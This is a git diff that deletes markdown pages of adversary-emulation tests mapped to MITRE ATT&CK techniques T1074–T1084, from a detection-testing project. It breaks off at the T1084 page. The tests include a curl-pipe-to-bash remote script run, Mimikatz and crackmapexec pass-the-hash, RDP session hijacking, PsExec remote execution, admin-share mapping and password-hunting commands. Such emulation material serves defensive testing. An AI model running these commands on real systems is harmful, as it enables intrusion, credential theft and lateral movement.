-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1074.md b/Atomic_Threat_Coverage/Triggers/T1074.md
deleted file mode 100644
index 1967b37..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1074.md
+++ /dev/null
@@ -1,113 +0,0 @@
-# T1074 - Data Staged
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1074)
-<blockquote>Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022).
-
-Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
-
-- [Atomic Test #2 - Stage data from Discovery.sh](#atomic-test-2---stage-data-from-discoverysh)
-
-- [Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp](#atomic-test-3---zip-a-folder-with-powershell-for-staging-in-temp)
-
-
-<br/>
-
-## Atomic Test #1 - Stage data from Discovery.bat
-Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
-verify that the file is saved in the temp directory.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP&#92;discovery.bat|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file}
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item -Force #{output_file} -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Stage data from Discovery.sh
-Utilize curl to download discovery.sh and execute a basic information gathering shell script
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Location to save downloaded discovery.bat file | Path | /tmp/T1074_discovery.log|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > #{output_file}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
-Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
-was placed in the temp directory.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder&#92;T1074&#92;bin&#92;Folder_to_zip|
-| output_file | Location to save zipped file or folder | Path | $env:TEMP&#92;Folder_to_zip.zip|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item -Path #{output_file} -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1075.md b/Atomic_Threat_Coverage/Triggers/T1075.md
deleted file mode 100644
index d3ffaa9..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1075.md
+++ /dev/null
@@ -1,90 +0,0 @@
-# T1075 - Pass the Hash
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1075)
-<blockquote>Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. 
-
-Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Mimikatz Pass the Hash](#atomic-test-1---mimikatz-pass-the-hash)
-
-- [Atomic Test #2 - crackmapexec Pass the Hash](#atomic-test-2---crackmapexec-pass-the-hash)
-
-
-<br/>
-
-## Atomic Test #1 - Mimikatz Pass the Hash
-Note: must dump hashes first
-[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| user_name | username | string | Administrator|
-| domain | domain | string | atomic.local|
-| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - crackmapexec Pass the Hash
-command execute with crackmapexec
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| user_name | username | string | Administrator|
-| domain | domain | string | atomic.local|
-| ntlm | command | string | cc36cf7a8514893efccd3324464tkg1a|
-| command | command to execute | string | whoami|
-| crackmapexec_exe | crackmapexec windows executable | Path | C:&#92;CrackMapExecWin&#92;crackmapexec.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})
-##### Check Prereq Commands:
-```powershell
-if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } 
-```
-##### Get Prereq Commands:
-```powershell
-Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1076.md b/Atomic_Threat_Coverage/Triggers/T1076.md
deleted file mode 100644
index 34d88ec..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1076.md
+++ /dev/null
@@ -1,93 +0,0 @@
-# T1076 - Remote Desktop Protocol
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1076)
-<blockquote>Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.
-
-Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)
-
-Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, <code>c:\windows\system32\tscon.exe [session number to be stolen]</code>, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - RDP hijacking](#atomic-test-1---rdp-hijacking)
-
-- [Atomic Test #2 - RDPto-DomainController](#atomic-test-2---rdpto-domaincontroller)
-
-
-<br/>
-
-## Atomic Test #1 - RDP hijacking
-RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| Session_ID | The ID of the session to which you want to connect | String | 1337|
-| Destination_ID | Connect the session of another user to a different session | String | rdp-tcp#55|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-query user
-sc.exe create sesshijack binpath= "cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}"
-net start sesshijack
-```
-
-#### Cleanup Commands:
-```cmd
-sc.exe delete sesshijack >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - RDPto-DomainController
-Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonserver%) as the current user
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("&#92;")|
-| username | Username argument default %USERDOMAIN%&#92;%username% | String | $Env:USERDOMAIN&#92;$ENV:USERNAME|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Connect-RDP -ComputerName #{logonserver} -User #{username}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Computer must be domain joined
-##### Check Prereq Commands:
-```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Write-Host Joining this computer to a domain must be done manually
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1077.md b/Atomic_Threat_Coverage/Triggers/T1077.md
deleted file mode 100644
index 618446b..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1077.md
+++ /dev/null
@@ -1,143 +0,0 @@
-# T1077 - Windows Admin Shares
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1077)
-<blockquote>Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include <code>C$</code>, <code>ADMIN$</code>, and <code>IPC$</code>. 
-
-Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)
-
-The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using <code>net use</code> commands with valid credentials. (Citation: Technet Net Use)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Map admin share](#atomic-test-1---map-admin-share)
-
-- [Atomic Test #2 - Map Admin Share PowerShell](#atomic-test-2---map-admin-share-powershell)
-
-- [Atomic Test #3 - Copy and Execute File with PsExec](#atomic-test-3---copy-and-execute-file-with-psexec)
-
-- [Atomic Test #4 - Execute command writing output to local Admin Share](#atomic-test-4---execute-command-writing-output-to-local-admin-share)
-
-
-<br/>
-
-## Atomic Test #1 - Map admin share
-Connecting To Remote Shares
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| share_name | Examples C$, IPC$, Admin$ | String | C$|
-| user_name | Username | String | DOMAIN&#92;Administrator|
-| password | Password | String | P@ssw0rd1|
-| computer_name | Target Computer Name | String | Target|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Map Admin Share PowerShell
-Map Admin share utilizing PowerShell
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| share_name | Examples C$, IPC$, Admin$ | String | C$|
-| computer_name | Target Computer Name | String | Target|
-| map_name | Mapped Drive Letter | String | g|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Copy and Execute File with PsExec
-Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| remote_host | Remote computer to receive the copy and execute the file | String | &#92;&#92;localhost|
-| command_path | File to copy and execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-psexec.exe #{remote_host} -c #{command_path}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Execute command writing output to local Admin Share
-Executes a command, writing the output to a local Admin Share.
-This technique is used by post-exploitation frameworks.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Remote computer to receive the copy and execute the file | String | output.txt|
-| command_to_execute | Command to execute for output. | String | hostname|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1081.md b/Atomic_Threat_Coverage/Triggers/T1081.md
deleted file mode 100644
index d0b8f1d..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1081.md
+++ /dev/null
@@ -1,125 +0,0 @@
-# T1081 - Credentials in Files
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1081)
-<blockquote>Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
-
-It is possible to extract passwords from backups or saved virtual machines through [Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)
-
-In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)
-
-</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Extract Browser and System credentials with LaZagne](#atomic-test-1---extract-browser-and-system-credentials-with-lazagne)
-
-- [Atomic Test #2 - Extract passwords with grep](#atomic-test-2---extract-passwords-with-grep)
-
-- [Atomic Test #3 - Extracting passwords with findstr](#atomic-test-3---extracting-passwords-with-findstr)
-
-- [Atomic Test #4 - Access unattend.xml](#atomic-test-4---access-unattendxml)
-
-
-<br/>
-
-## Atomic Test #1 - Extract Browser and System credentials with LaZagne
-[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-python2 laZagne.py all
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Extract passwords with grep
-Extracting credentials from files
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_path | Path to search | String | /|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-grep -ri password #{file_path}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Extracting passwords with findstr
-Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-findstr /si pass *.xml *.doc *.txt *.xls
-ls -R | select-string -Pattern password
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Access unattend.xml
-Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
-If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-type C:\Windows\Panther\unattend.xml
-type C:\Windows\Panther\Unattend\unattend.xml
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1082.md b/Atomic_Threat_Coverage/Triggers/T1082.md
deleted file mode 100644
index 3e2ead2..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1082.md
+++ /dev/null
@@ -1,262 +0,0 @@
-# T1082 - System Information Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1082)
-<blockquote>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-### Windows
-
-Example commands and utilities that obtain this information include <code>ver</code>, [Systeminfo](https://attack.mitre.org/software/S0096), and <code>dir</code> within [cmd](https://attack.mitre.org/software/S0106) for identifying information based on present files and directories.
-
-### Mac
-
-On Mac, the <code>systemsetup</code> command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the <code>system_profiler</code> gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.
-
-### AWS
-
-In Amazon Web Services (AWS), the Application Discovery Service may be used by an adversary to identify servers, virtual machines, software, and software dependencies running.(Citation: Amazon System Discovery)
-
-### GCP
-
-On Google Cloud Platform (GCP) <code>GET /v1beta1/{parent=organizations/*}/assets</code> or <code>POST /v1beta1/{parent=organizations/*}/assets:runDiscovery</code> may be used to list an organizations cloud assets, or perform asset discovery on a cloud environment.(Citation: Google Command Center Dashboard)
-
-### Azure
-
-In Azure, the API request <code>GET https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachines/{vmName}?api-version=2019-03-01</code> may be used to retrieve information about the model or instance view of a virtual machine.(Citation: Microsoft Virutal Machine API)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - System Information Discovery](#atomic-test-1---system-information-discovery)
-
-- [Atomic Test #2 - System Information Discovery](#atomic-test-2---system-information-discovery)
-
-- [Atomic Test #3 - List OS Information](#atomic-test-3---list-os-information)
-
-- [Atomic Test #4 - Linux VM Check via Hardware](#atomic-test-4---linux-vm-check-via-hardware)
-
-- [Atomic Test #5 - Linux VM Check via Kernel Modules](#atomic-test-5---linux-vm-check-via-kernel-modules)
-
-- [Atomic Test #6 - Hostname Discovery (Windows)](#atomic-test-6---hostname-discovery-windows)
-
-- [Atomic Test #7 - Hostname Discovery](#atomic-test-7---hostname-discovery)
-
-- [Atomic Test #8 - Windows MachineGUID Discovery](#atomic-test-8---windows-machineguid-discovery)
-
-
-<br/>
-
-## Atomic Test #1 - System Information Discovery
-Identify System Info. Upon execution, system info and time info will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-systeminfo
-reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - System Information Discovery
-Identify System Info
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-system_profiler
-ls -al /Applications
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - List OS Information
-Identify System Info
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Output file used to store the results. | path | /tmp/T1082.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-uname -a >> #{output_file}
-if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi;
-if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi;      
-if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi;
-uptime >> #{output_file}
-cat #{output_file} 2>/dev/null
-```
-
-#### Cleanup Commands:
-```sh
-rm #{output_file} 2>/dev/null
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Linux VM Check via Hardware
-Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi;
-if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi;
-if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi;
-if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi;
-if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi;
-if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi;
-if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"
-if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Linux VM Check via Kernel Modules
-Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-sudo lsmod | grep -i "vboxsf\|vboxguest"
-sudo lsmod | grep -i "vmw_baloon\|vmxnet"
-sudo lsmod | grep -i "xen-vbd\|xen-vnif"
-sudo lsmod | grep -i "virtio_pci\|virtio_net"
-sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Hostname Discovery (Windows)
-Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-hostname
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Hostname Discovery
-Identify system hostname for Linux and macOS systems.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-hostname
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Windows MachineGUID Discovery
-Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1083.md b/Atomic_Threat_Coverage/Triggers/T1083.md
deleted file mode 100644
index 645eab0..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1083.md
+++ /dev/null
@@ -1,163 +0,0 @@
-# T1083 - File and Directory Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1083)
-<blockquote>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-### Windows
-
-Example utilities used to obtain this information are <code>dir</code> and <code>tree</code>. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.
-
-### Mac and Linux
-
-In Mac and Linux, this kind of discovery is accomplished with the <code>ls</code>, <code>find</code>, and <code>locate</code> commands.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - File and Directory Discovery (cmd.exe)](#atomic-test-1---file-and-directory-discovery-cmdexe)
-
-- [Atomic Test #2 - File and Directory Discovery (PowerShell)](#atomic-test-2---file-and-directory-discovery-powershell)
-
-- [Atomic Test #3 - Nix File and Diectory Discovery](#atomic-test-3---nix-file-and-diectory-discovery)
-
-- [Atomic Test #4 - Nix File and Directory Discovery 2](#atomic-test-4---nix-file-and-directory-discovery-2)
-
-
-<br/>
-
-## Atomic Test #1 - File and Directory Discovery (cmd.exe)
-Find or discover files on the file system.  Upon execution, the file "download" will be placed in the temporary folder and contain the output of
-all of the data discovery commands.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-dir /s c:\ >> %temp%\download
-dir /s "c:\Documents and Settings" >> %temp%\download
-dir /s "c:\Program Files\" >> %temp%\download
-dir "%systemdrive%\Users\*.*" >> %temp%\download
-dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
-dir "%userprofile%\Desktop\*.*" >> %temp%\download
-tree /F >> %temp%\download
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - File and Directory Discovery (PowerShell)
-Find or discover files on the file system. Upon execution, file and folder information will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-ls -recurse
-get-childitem -recurse
-gci -recurse
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Nix File and Diectory Discovery
-Find or discover files on the file system
-
-References:
-
-http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/
-
-https://perishablepress.com/list-files-folders-recursively-terminal/
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Output file used to store the results. | path | /tmp/T1083.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-ls -a >> #{output_file}
-if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi;
-file */* *>> #{output_file}
-cat #{output_file} 2>/dev/null
-find . -type f
-ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
-locate *
-which sh
-```
-
-#### Cleanup Commands:
-```sh
-rm #{output_file}
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Nix File and Directory Discovery 2
-Find or discover files on the file system
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Output file used to store the results. | path | /tmp/T1083.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
-if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
-find . -type f -iname *.pdf >> #{output_file}
-cat #{output_file}; fi;
-find . -type f -name ".*"
-```
-
-#### Cleanup Commands:
-```sh
-rm #{output_file}
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1084.md b/Atomic_Threat_Coverage/Triggers/T1084.md
deleted file mode 100644
index 9d6fd38..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1084.md
+++ /dev/null
@@ -1,63 +0,0 @@
-# T1084 - Windows Management Instrumentation Event Subscription
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1084)
-<blockquote>Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription)
-
-
-<br/>
-
-## Atomic Test #1 - Persistence via WMI Event Subscription
-Run from an administrator powershell window. After running, reboot the victim machine.
-After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
-
-Code references
-
-https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
-
-https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
-
-**Supported Platforms:** Windows
-
-
-
-
-
